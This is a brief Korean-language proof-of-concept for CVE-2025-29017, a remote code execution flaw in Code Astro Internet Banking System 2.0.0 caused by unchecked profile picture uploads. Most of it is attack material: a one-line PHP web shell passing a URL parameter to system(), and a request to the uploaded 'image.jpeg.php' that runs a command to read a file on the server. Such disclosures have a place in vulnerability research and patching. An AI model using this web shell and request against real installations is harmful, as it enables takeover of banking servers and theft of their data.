
CVE-2025-29017에 대한 개념 증명 익스플로잇, Code Astro Internet Banking System 2.0.0에서 악성 프로필 사진 업로드를 통한 원격 코드 실행을 시연합니다.
Code Astro Internet Banking System 2.0.0에서 pages_view_client.php의 profile_pic 매개변수에 대한 파일 업로드 검증 부재로 인해 원격 코드 실행(RCE) 취약점이 존재합니다. 공격자는 업로드 요청을 수정하여 보안 검사를 우회하고 임의 코드 실행을 유발할 수 있습니다.
pages_view_client.php의 profile_pic 매개변수


<?php system($_GET['cmd']); ?>


http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt
